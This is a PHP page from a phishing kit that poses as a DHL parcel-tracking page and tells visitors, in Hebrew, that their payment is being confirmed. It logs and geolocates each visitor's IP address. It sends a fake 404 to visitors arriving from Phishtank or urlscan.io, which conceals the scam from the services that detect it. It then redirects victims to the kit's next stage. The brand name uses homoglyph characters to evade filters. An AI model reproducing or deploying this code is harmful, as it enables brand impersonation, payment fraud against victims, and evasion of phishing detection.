File: /home/bashacomputer/www/iljawa/torsion/load.php
<?php
include "anti/ant1.php";
include "anti/ant2.php";
include "anti/ant3.php";
include "anti/ant4.php";
include "anti/ant8.php";
$ip = getenv("REMOTE_ADDR");
$file = fopen("log.txt","a");
fwrite($file,$ip." - ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
$IP_LOOKUP = @json_decode(file_get_contents("http://ip-api.com/json/".$ip));
$COUNTRY = $IP_LOOKUP->country . "\r\n";
$CITY = $IP_LOOKUP->city . "\r\n";
$REGION = $IP_LOOKUP->region . "\r\n";
$STATE = $IP_LOOKUP->regionName . "\r\n";
$ZIPCODE = $IP_LOOKUP->zip . "\r\n";
$message=$ip."\nCountry : ".$COUNTRY."City: " .$CITY."Region : " .$REGION."State: " .$STATE."Zip : " .$ZIPCODE;
$pra=rand();
$pra=md5($pra);
### Perform a HTTP REFERER check on the visitor to see if they are coming from the Phishtank website ###
if(isset($_SERVER['HTTP_REFERER'])) {
if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') {
$content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
$save=fopen("phistank.txt","a+");
fwrite($save,$content);
fclose($save);
header("HTTP/1.0 404 Not Found");exit();
}
}
if(isset($_SERVER['HTTP_REFERER'])) {
if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') {
$content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
$save=fopen("phistank.txt","a+");
fwrite($save,$content);
fclose($save);
header("HTTP/1.0 404 Not Found");exit();
}
}
if(isset($_SERVER['HTTP_REFERER'])) {
if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.urlscan.io') {
$content = "#> ".$_SERVER['HTTP_USER_AGENT']." [ Phishtank ] \r\n";
$save=fopen("phistank.txt","a+");
fwrite($save,$content);
fclose($save);
header("HTTP/1.0 404 Not Found");exit();
}
}
?>
<html lang="en"><head></head><body><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="refresh" content="10; URL='<?php echo"xsmsz.php?Key=$ip=$pra$pra$pra$pra$ip$COUNTRY" ?>' ">
<link rel="shortcut icon" href="img/dНl-logo.jpg">
<link rel="stylesheet" href="css/css3.css">
<title>DНL Tracking</title>
<div class="col-md-12 col-sm-12 form-wrap" style="margin-top:0; border-radius:0 0 5px 5px;">
<div class="justified-wrap">
<style type="text/css">
.loader {
border: 16px solid #f3f3f3;
border-radius: 50%;
border-top: 16px solid black;
width: 50px;
height: 50px;
-webkit-animation: spin 2s linear infinite; /* Safari */
animation: spin 2s linear infinite;
}
/* Safari */
@-webkit-keyframes spin {
0% { -webkit-transform: rotate(0deg); }
100% { -webkit-transform: rotate(360deg); }
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
</style>
<div class="msg-page">
<!-- header -->
<div class="msg-header">
<div class="msg-header-img">
<img src="img/lg.svg" alt="">
</div>
</div>
<div class="col-md-12 col-sm-12 no-space">
<div class="load-confirm">
<center>אשר תשלום...</center>
<br>
<center><div class="loader"></div></center>
</div>
<div class="clearfix"></div>
<div class="alert alert-danger display-hide" style="display:none;">
<button data-dismiss="alert" class="close" type="button">×</button>
<strong> Error!</strong> All fields are required. </div>
<div class="clearfix"></div>
<!--
</div>-->
<div class="text-nav" style=" text-align:center; margin-top:15px;"><span>אל תסגור את הדף,</span></div>
<div style="display: none;" id="hidden_fields"></div>
</div>
<div class="msg-footer">
<span class="msg-footer-right">© 2023 DНL International GmbН - All rights reserved.</span>
</div>
</div>
</div></div></body></html>